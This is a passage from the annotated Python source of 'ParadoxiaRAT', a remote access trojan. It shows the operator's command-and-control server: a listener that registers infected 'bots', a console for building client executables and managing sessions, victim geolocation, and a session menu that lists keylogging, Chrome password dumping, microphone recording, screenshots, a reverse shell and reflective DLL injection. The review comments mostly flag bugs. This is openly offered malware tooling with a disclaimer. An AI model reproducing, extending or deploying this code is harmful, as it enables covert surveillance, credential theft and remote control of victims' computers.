    wan_ip_list, oslist and ClientInfoList; reads the file "blacklist" from the
    current working directory; calls exit() if bind() raises PermissionError.
    Returns: never under normal operation (infinite accept loop); see the
    `break` statements for the conditions that end the loop.
    """
 710 |     global iplist
 711 |     server = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
 712 |     server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    # TCP keepalive: first probe after 1 s idle, 1 s between probes, drop after 5
    # failed probes. The SOL_TCP/TCP_KEEP* options are not available on every
    # platform; this listing only shows them being set unconditionally.
 713 |     server.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
 714 |     server.setsockopt(socket.SOL_TCP, socket.TCP_KEEPIDLE, 1)
 715 |     server.setsockopt(socket.SOL_TCP, socket.TCP_KEEPINTVL, 1)
 716 |     server.setsockopt(socket.SOL_TCP, socket.TCP_KEEPCNT, 5)
 717 | 
    # Bind address/port come from the [server] section of paradoxia.ini
    # (server_settings is defined outside this listing).
 718 |     host = server_settings['host']
 719 |     port = int(server_settings['port'])
 720 | 
    # Load the source-IP blacklist from ./blacklist; any line containing '#' is
    # treated as a comment and skipped. The file handle is never closed.
 721 |     blist = open("blacklist", "r")
 722 |     bl_ips = blist.readlines()
 723 |     for i in range(len(bl_ips)):
 724 |         if("#" in bl_ips[i]):
 725 |             pass
 726 |         else:
 727 |             blacklist.append(bl_ips[i])
 728 | 
    # Binding a privileged port without the right capability raises PermissionError;
    # any other bind failure is re-raised unchanged.
 729 |     try:
 730 |         server.bind((host, port))
 731 |     except PermissionError:
 732 |         print("["+Style.BRIGHT + Fore.LIGHTYELLOW_EX + "^" + Style.RESET_ALL + "] Run as sudo.")
 733 |         exit(True)
 734 |     except Exception as i:
 735 |         raise i
 736 | 
 737 |     try:
 738 |         server.listen(5)
 739 |         #print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] TCP Server running. ({host}:{port})".format(host=host, port=server_settings['port']))
 740 |     except KeyboardInterrupt:
 741 |         print(" Keyboard Interrupt, Exit.")
 742 |         exit()
 743 |     except Exception as errunknown:
 744 |         print(str(errunknown))
 745 | 
    # Accept loop: one peer per iteration.
 746 |     while(True):
 747 | 
 748 |         client, addr = server.accept()
        # A blacklisted source address is shut down; note that the `break` here
        # leaves the accept loop itself, not just this iteration.
 749 |         if(addr[0] in blacklist):
 750 |             print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] New Connection form blacklisted IP " + str(addr[0]) +":"+ str(addr[1]))
 751 |             print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Connection Closed.")
 752 |             client.shutdown(socket.SHUT_RDWR)
 753 |             client.close()
 754 |             break
 755 | 
 756 | 
        # Handshake step 1: request the peer's host/user identifier. This rebinds
        # the local name `host` (used for bind() above) to the peer's reply, and a
        # failure here also `break`s out of the accept loop.
 757 |         try:
 758 |             client.send("host".encode())
 759 |             host = client.recv(1024).decode() # Receive User PC ' Test / TEST-PC '. I call this host. And all of these are saved in hostList
 760 |             hostList.append(host)
 761 |         except Exception as e:
 762 |             print(str(e))
 763 |             break
 764 | 
        # Handshake steps 2-3: register the peer, then request its WAN IP and OS
        # string. A reply starting with "No" is stored verbatim; otherwise the
        # reply appears to be of the form "label:ip" and only the ip part is kept.
 765 |         wanip = ""
 766 |         try:
 767 |             cld = ParadoxiaClient(client)
 768 |             clients.append(client)
 769 |             client_ip = str(addr[0]) +":"+ str(addr[1])
 770 |             iplist.append(client_ip)
 771 |             client.send("wanip".encode())
 772 |             wanip = client.recv(1024).decode()
 773 | 
 774 |             if(wanip.startswith("No")):
 775 |                 wan_ip_list.append(wanip)
 776 |             else:
 777 |                 wan_ip_list.append(wanip.split(":")[1])
 778 | 
 779 |             client.send("os".encode())
            # NOTE: this assignment makes `os` a function-local string, shadowing the
            # os module for the whole of TCPServer.
 780 |             os = client.recv(1024).decode()
 781 | 
 782 |             oslist.append(os)
 783 | 
 784 |             full_info = cld.getClientInformation()
 785 |             ClientInfoList.append(full_info)
        # Roll back the registration if the peer drops mid-handshake. iplist holds
        # "ip:port" strings (line 769) while the removal below uses the bare address;
        # `os` is only bound once line 780 has run.
 786 |         except ConnectionResetError as cRe:
 787 |             print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] ERROR : " + str(cRe) + ".")
 788 |             clients.remove(client)
 789 |             iplist.remove(str(addr[0]))
 790 |             oslist.remove(os)
 791 |         except ConnectionAbortedError as cAe:
 792 |             print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] ERROR : " + str(cAe) + ".")
 793 |             clients.remove(client)
 794 |             iplist.remove(str(addr[0]))
 795 |             oslist.remove(os)
 796 | 
 797 |         except Exception as e: 
 798 |             print("[X] Error : " + str(e))
 799 | 
        # `filename` is computed here but not referenced anywhere else in this function.
 800 |         if(wanip.startswith(("No"))):
 801 |             filename = "bots/"+str(addr[0])
 802 |         else:
 803 |             filename = "bots/"+str(wanip)
        # bot_settings['verbose'] is compared as the string "True" (configparser values are strings).
 804 |         if(bot_settings['verbose'] == "True"):
 805 |             print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Getting information..")
        # Desktop notification and banner, then the per-peer receive loop on its own thread.
 806 |         notify("Paradoxia", "New Connection : " + cld.returnClientName())
 807 |         # default
 808 |         print( Style.BRIGHT + Fore.GREEN + "\n[ Session Opened ] " + Style.RESET_ALL + cld.returnClientName())
 809 |         _thread.start_new_thread(cld.ClientThread, ())
 810 | 
 811 | 
 812 | 
 813 | def Console():
    """
    Operator console loop.

    Starts TCPServer() on a background thread, then reads lines from prompt()
    and dispatches on the first word: list/sessions, session <id>, exit, help,
    build, kill <id>, clientinfo <id>. Any other non-empty line is handed
    verbatim to `bash -c` on the local machine (line 939), so the console is
    also a local shell — it is only ever meant to receive operator-typed input.
    When the module-level `silent` flag is set, the loop iterates without
    reading input. Returns: never (exit() is called from the "exit" branch).
    """
 814 |     global iplist
    # Send `data` (str) to the registered client at index `csocket`; on any send
    # failure the socket is dropped from `clients`.
 815 |     def SendData(csocket, data):
 816 |         csocket = int(csocket)
 817 |         sockfd = clients[csocket]
 818 | 
 819 |         try:
 820 |             sockfd.send(data.encode())
 821 |         except Exception as error:
 822 |             clients.remove(sockfd)
 823 |             print("Error Occured : " + str(error))
 824 | 
    # Print one line per registered session; the parallel lists iplist,
    # wan_ip_list and oslist are indexed together, so any length mismatch
    # surfaces as the printed "Error : ..." message.
 825 |     def list_bots():
 826 |         print("\nActive Sessions (" + str(len(clients)) +")")
 827 |         print("===================================")
 828 |         try:
 829 |             if(len(clients) > 0):
 830 |                 for i in range(len(iplist)):
 831 |                     print(
 832 |                         "\n[ Session ID : "+str(i) +" ][ Connection : "+iplist[i] + " ][ WAN : "+wan_ip_list[i] +" ][ Operating System : " + oslist[i] + " ]"
 833 |                     )
 834 |         except Exception as stre:
 835 |             print("Error : " + str(stre))
 836 | 
 837 |     _thread.start_new_thread(TCPServer, ())
 838 |     global silent
 839 |     while(True):
 840 |         try:
            # Commands are only read while not silent; otherwise this loop spins.
 841 |             if(silent == False):
 842 |                 promptstr = "paradoxia >> "
 843 |                 x = prompt(promptstr)
 844 |                 args = x.split()
 845 |                 if(x == "list" or x == "sessions"):
 846 |                     list_bots()
                # "session <id>": wrap the selected socket in a fresh ParadoxiaClient
                # and enter its interactive Session(); a missing/invalid index is an IndexError.
 847 |                 elif(x.startswith("session")):
 848 |                     try:
 849 |                         cid = args[1]
 850 |                         sock = clients[int(cid)]
 851 |                         sess = ParadoxiaClient(sock)
 852 |                         sess.Session()
 853 |                     except IndexError:
 854 |                         print("USAGE : session < client id >")
 855 | 
                # "exit": with live sessions, ask before broadcasting "kill"
                # (broadcast is defined outside this listing); exit(True) either way
                # unless the operator declines.
 856 |                 elif(x == "exit"):
 857 |                     if(len(clients) > 0):
 858 |                         print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] You have online bots? Kill the connections?")
 859 |                         yn = prompt("[+] Your Desicion (y/N) : ").lower()
 860 |                         if(yn == "y"):
 861 |                             broadcast("kill")
 862 |                             print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Disconnected everyone.")
 863 |                             exit(True)
 864 |                         else:
 865 |                             pass
 866 |                     else:
 867 |                         exit(True)
 868 |                 elif(x == "help"):
 869 |                     print(Style.BRIGHT + Fore.GREEN +
 870 | """
 871 | ParadoxiaRAT
 872 | ---------------
 873 | -> Commands :
 874 | -. help - Print this help message.
 875 | -. sessions - View online clients.
 876 | -. session - interact with a session.
 877 | -. build - Build Client.
 878 | -. clientinfo < cid > - View session information.
 879 | -. kill - Kill session.
 880 | -. exit - Exit.
 881 | Use the help command inside a session to view Session specific help.
 882 | ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=
 883 | Created by : QuantumCore (Fahad)
 884 | Website : https://quantumcored.com
 885 | Email : quantumcore@protonmail.com
 886 | Discord : https://discordapp.com/invite/8snh7nx
 887 | Github Repository : https://github.com/quantumcored/paradoxia
 888 | If you find any bugs, Please Report them here : https://github.com/quantumcored/paradoxia/issues
 889 | ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=
 890 | The Developer is not responsible for any misuse of Damage caused by the program. This is created only to innovate Information Security and YOU.
 891 | """
 892 |                     + Style.RESET_ALL)
                # "build": collect parameters interactively and call Build (defined
                # outside this listing). Every value must be non-empty; the icon path
                # is passed as None when the operator declines an icon.
 893 |                 elif(x == "build"):
 894 |                     host = prompt("[+] Host : ")
 895 |                     port = prompt("[+] Port : ")
 896 |                     name = prompt("[+] Installation Name (.exe) : ")
 897 |                     installdir = prompt("[+] Installation Folder name : ")
 898 | 
 899 |                     output = prompt("[+] Output file name (.exe) : ")
 900 |                     askicon = prompt("[?] Would you like to build with Icon? (Y/n) : ")
 901 |                     askicon = askicon.lower()
 902 |                     if(askicon== "y"):
 903 |                         icon_path = prompt("[+] Icon Path (.ico) : ")
 904 |                         if(len(icon_path) > 0):
 905 |                             if(len(host) > 0 and len(port) > 0 and len(output) > 0 and len(name) > 0 and len(installdir) > 0):
 906 |                                 Build(host, port, icon_path,output, name, installdir)
 907 |                         else:
 908 |                             print("[+] NO icon path specified.")
 909 |                     else:
 910 |                         if(len(host) > 0 and len(port) > 0 and len(output) > 0 and len(name) > 0 and len(installdir) > 0):
 911 |                             Build(host, port, None ,output, name, installdir)
 912 |                         else:
 913 |                             print("[+] One or more values not entered correctly.")
                # "kill <id>": send the literal "kill" to the client, then close our end.
 914 |                 elif(x.startswith("kill")):
 915 |                     try:
 916 |                         cid = int(args[1])
 917 |                         SendData(cid, "kill")
 918 |                         clients[cid].shutdown(socket.SHUT_RDWR)
 919 |                         clients[cid].close()
 920 | 
 921 |                     except IndexError:
 922 |                         print("USAGE : kill ")
 923 | 
                # "clientinfo <id>": `x` is rebound from the command string to the int index here.
 924 |                 elif(x.startswith("clientinfo")):
 925 |                     try:
 926 |                         x = int(args[1])
 927 |                         print(ClientInfoList[x])
 928 |                     except IndexError:
 929 |                         print("["+Style.BRIGHT + Fore.LIGHTBLUE_EX + "*" + Style.RESET_ALL + "] USAGE : clientinfo < cid >")
 930 | 
 931 |                     except Exception as UnknownException:
 932 |                         print("["+Style.BRIGHT + Fore.LIGHTBLUE_EX + "*" + Style.RESET_ALL + "] Error : " + str(UnknownException))
 933 | 
 934 | 
                # Fallback: any other non-empty line is executed by the local bash.
 935 |                 else:
 936 |                     if(len(x) > 0):
 937 |                         try:
 938 |                             print(Style.BRIGHT + Fore.LIGHTCYAN_EX )
 939 |                             subprocess.run(['bash', '-c', x])
 940 |                             print(Style.RESET_ALL)
 941 |                         except Exception as procError:
 942 |                             print("["+Style.BRIGHT + Fore.LIGHTBLUE_EX + "*" + Style.RESET_ALL + "] Error : " + str(procError))
 943 |         except KeyboardInterrupt:
 944 |             print("[X] Interrupt, Type exit to Exit.")
 945 | 
-------------------------------------------------------------------------------- /kernel/other.py: --------------------------------------------------------------------------------
 1 | from plyer import notification
 2 | import os
 3 | from colorama import Style, Fore
 4 | import colorama
 5 | from PIL import Image
 6 | from plyer import 
notification
 7 | import geoip2.database
 8 | 
 9 | 
# Help text printed by the per-session "help" command in kernel/main.py's
# Session(); it is a raw string so the backslash-free layout is kept as written.
 10 | session_help = r"""
 11 | 
 12 | Session Commands
 13 | =================
 14 | -. info - View Client information.
 15 | -. help - Print this help message.
 16 | -. exit - Exit session.
 17 | 
 18 | File Management
 19 | =================
 20 | -. upload - Upload files.
 21 | -. download - Download files.
 22 | -. drives - Get all available drive letters.
 23 | -. dir < directory > - Change current directory. (-s switch to specify Name with spaces)
 24 | -. delete < file > - Delete a file.
 25 | -. ls - List files in current directory.
 26 | 
 27 | Surveillance
 28 | =================
 29 | -. screenshot - Take Screen shot.
 30 | -. micrecord - Start recording microphone.
 31 | -. chromedump - Dump Google Chrome Passwords.
 32 | 
 33 | Information Gathering
 34 | =================
 35 | -. admin - Check if Client has Administrator rights.
 36 | -. geolocate - Geolocate.
 37 | -. keylog_start - Start Logging Keystrokes.
 38 | -. keylog_dump - Dump logged Keystrokes and clear buffer.
 39 | -. processinfo - Get Process information.
 40 | 
 41 | System
 42 | =================
 43 | -. shell - Reverse shell.
 44 | -. dllinject - Reflective DLL Injection. Load your own Reflective DLL.
 45 | -. poweroff - Shutdown the System.
 46 | -. reboot - reboot the System.
 47 | -. pkill - Kill a Process.
 48 | 
 49 | Client
 50 | =================
 51 | -. kill - Kill Session / Close Session.
 52 | -. die - Kill Client and Close connection. 
 53 | """
 54 | 
 55 | 
 56 | def clear_screen():
    """Clear the terminal by shelling out to `cls` (Windows) or `clear` (elsewhere)."""
 57 |     if(os.name == "nt"):
 58 |         os.system("cls")
 59 |     else:
 60 |         os.system("clear")
 61 | 
 62 | def saveAndShowImage(image):
    """
    Re-save the file at `image` in place as PNG and open it in the default viewer.

    Called from ClientThread after a screenshot download; by then the path has
    already had "bmp" replaced with "png" in its name, so the on-disk format is
    what changes here. Any failure is only printed, never raised.
    """
 63 |     try:
 64 |         im = Image.open(image)
 65 |         im.save(image, "PNG")
 66 |         im.show()
 67 |     except Exception as e:
 68 |         print("Error converting bmp to png : " + str(e))
 69 | 
 70 | 
 71 | 
 72 | def uniquify(path):
 73 |     """
 74 |     Credits : https://stackoverflow.com/questions/13852700/create-file-but-if-name-exists-add-number/57896232#57896232
    
    NOTE(review): this copy computes a non-colliding "name (N).ext" path but has
    no return statement, so it returns None. kernel/main.py's ClientThread
    defines its own inner uniquify() that does return the path and uses that one.
 75 |     """
 76 |     filename, extension = os.path.splitext(path)
 77 |     counter = 1
 78 | 
 79 |     while os.path.exists(path):
 80 |         path = filename + " (" + str(counter) + ")" + extension
 81 |         counter += 1
 82 | 
 83 | 
 84 | def PrintTextFile(filename):
    """
    Print the contents of a text file (used to echo files saved under loot/).
    Errors, including a missing file, are printed rather than raised.
    """
 85 |     try:
 86 |         with open(filename, "r") as inn:
 87 |             data = inn.read()
 88 |             print(data)
 89 |     except Exception as e:
 90 |         print("[X] Error : " + str(e))
 91 | 
 92 | 
 93 | def notify(title, message):
    """Show a desktop notification via plyer."""
 94 |     notification.notify(
 95 |         title,
 96 |         message
 97 |     )
 98 | 
 99 | def GeoLocate(ip):
    """
    Look up `ip` in the bundled GeoLite2-City.mmdb (path relative to the current
    working directory) and print a country/region/city summary plus a Google
    Maps link built from the latitude/longitude.

    Unlike scan_ip() in kernel/scanner.py there is no try/except here, so a
    lookup failure (unknown or private address, missing database) propagates to
    the caller. The Reader is never closed. Returns None: the bare `return` on
    line 128 ends the function, and the formatted string after it is unreachable.
    """
 100 |     database_path = "GeoLite2-City.mmdb"
 101 |     database = geoip2.database.Reader(database_path)
 102 |     ip_info = database.city(ip)
 103 |     ISO_CODE = ip_info.country.iso_code
 104 |     country = ip_info.country.name
 105 |     pstlcode = ip_info.postal.code
 106 |     reigon = ip_info.subdivisions.most_specific.name
 107 |     city = ip_info.city.name
 108 |     # location = str(ip_info.location.latitude) + " " + str(ip_info.location.longitude)
 109 |     location = "https://www.google.com/maps?q="+str(ip_info.location.latitude)+","+str(ip_info.location.longitude)
 110 |     print(
 111 | """
 112 | Geolocation
 113 | ----------------
 114 | ISO Code : {isocode}
 115 | Country : {country}
 116 | Postal Code : {pstl}
 117 | Reigon : {reigon}
 118 | City : {city}
 119 | Location : {loc}
 120 | """.format(isocode = ISO_CODE,
 121 |     country = country,
 122 |     pstl = pstlcode,
 123 |     reigon = reigon,
 124 |     city = city,
 125 |     loc = location)
 126 |     )
 127 | 
 128 |     return
    # Everything below is dead code: it follows the bare `return` above.
 129 |     """\n
 130 | [+] ISO Code : {isocode}
 131 | [+] Country : {country}
 132 | [+] Postal Code : {pstl}
 133 | [+] Reigon : {reigon}
 134 | [+] City : {city}
 135 | [+] Location : {loc}
 136 | """.format(isocode = ISO_CODE,
 137 |     country = country,
 138 |     pstl = pstlcode,
 139 |     reigon = reigon,
 140 |     city = city,
 141 |     loc = location
 142 |     )
-------------------------------------------------------------------------------- /kernel/scanner.py: --------------------------------------------------------------------------------
 1 | """
 2 | 
 3 | Have a good time reading the source. You are an amazing person.
 4 | 
 5 | """
 6 | import geoip2.database
# `socket` is imported but not used anywhere in this module.
 7 | import socket
# Path is relative to the process's working directory, not to this file.
 8 | database_path = "GeoLite2-City.mmdb"
 9 | 
 10 | def scan_ip(IP_ADDR):
    """
    Print a GeoLite2 city-level lookup for IP_ADDR (ISO code, country, postal
    code, region, city and a Google Maps link).

    The geoip2 Reader is opened per call and never closed. Any exception —
    including an address not present in the database — is caught, printed as
    "[SCANNER ERROR]", and followed by a hint line; nothing is returned.
    """
 11 | 
 12 |     try:
 13 |         database = geoip2.database.Reader(database_path)
 14 |         ip_info = database.city(IP_ADDR)
 15 |         ISO_CODE = ip_info.country.iso_code
 16 |         country = ip_info.country.name
 17 |         pstlcode = ip_info.postal.code
 18 |         reigon = ip_info.subdivisions.most_specific.name
 19 |         city = ip_info.city.name
 20 |         # location = str(ip_info.location.latitude) + " " + str(ip_info.location.longitude)
 21 |         location = "https://www.google.com/maps?q="+str(ip_info.location.latitude)+","+str(ip_info.location.longitude)
 22 | 
 23 |         print("[+] IP : " + str(IP_ADDR))
 24 |         print(" |_ ISO Code : " + str(ISO_CODE))
 25 |         print(" |_ Country : " + str(country))
 26 |         print(" |_ Postal Code : "+str(pstlcode))
 27 |         print(" |_ Reigon : " + str(reigon))
 28 |         print(" |_ City : " + str(city))
 29 |         print(" |_ Location : " + str(location))
 30 | 
 31 | 
 32 |     except Exception as ERROR:
 33 |         print("[SCANNER ERROR] : {error}".format(error = ERROR))
 34 |         print("[+] IP : " + str(IP_ADDR))
 35 |         print(" |_ Do further scanning with nmap and / or Blacklist.")
 36 | 
-------------------------------------------------------------------------------- /loot/README.md: --------------------------------------------------------------------------------
 1 | # LOOT
 2 | --------------------------------------------------------------------------------
/paradoxia.ini: --------------------------------------------------------------------------------
 1 | # Server Settings
# Read by kernel/main.py as server_settings['host'] / server_settings['port']
# (TCPServer). 0.0.0.0 binds every interface, and the listener is a plain TCP
# socket with no TLS wrapping visible in the code, so the protocol on the port
# below is cleartext even though 443 is conventionally a TLS port.
 2 | [server]
 3 | host = 0.0.0.0
 4 | port = 443
 5 | # Bot Settings
# verbose is read as bot_settings['verbose'] and compared to the string "True";
# auto_print_bot_info is not referenced anywhere in the code shown on this page.
 6 | [bot]
 7 | verbose = True
 8 | auto_print_bot_info = False
 9 | 
-------------------------------------------------------------------------------- /paradoxia.py: --------------------------------------------------------------------------------
# NOTE: the shebang on line 2 sits inside a string literal, so it has no effect;
# the script must be started explicitly with the interpreter.
 1 | """
 2 | #!/usr/bin/python3
 3 | """
 4 | 
 5 | """
 6 | 
 7 | Have a good time reading the source. You are an amazing person.
 8 | 
 9 | """
# Star imports pull Console/clear_screen and the rest of the kernel API into
# this namespace; `_thread` is not used in this file.
 10 | from kernel.main import *
 11 | from kernel.other import *
 12 | from kernel.banner import pbanner
 13 | import _thread
 14 | 
 15 | def main():
    """Entry point: clear the screen, print the banner, then run the operator Console (which starts the listener thread)."""
 16 |     clear_screen()
 17 |     print(pbanner())
 18 |     Console()
 19 | 
# Called unconditionally at import time — there is no `if __name__ == "__main__"` guard.
 20 | main()
 21 | 
-------------------------------------------------------------------------------- /requirements.txt: --------------------------------------------------------------------------------
# Of the modules shown on this page, only geoip2, plyer and colorama are imported;
# kernel/other.py also imports PIL (Pillow), which is not listed here. The
# remaining entries may be used by kernel/builder.py or kernel/banner.py, which
# are not part of this listing.
 1 | geoip2
 2 | configparser
 3 | plyer
 4 | tqdm
 5 | names
 6 | random-username
 7 | requests
 8 | requests[socks]
 9 | stem
 10 | colorama
 11 | --------------------------------------------------------------------------------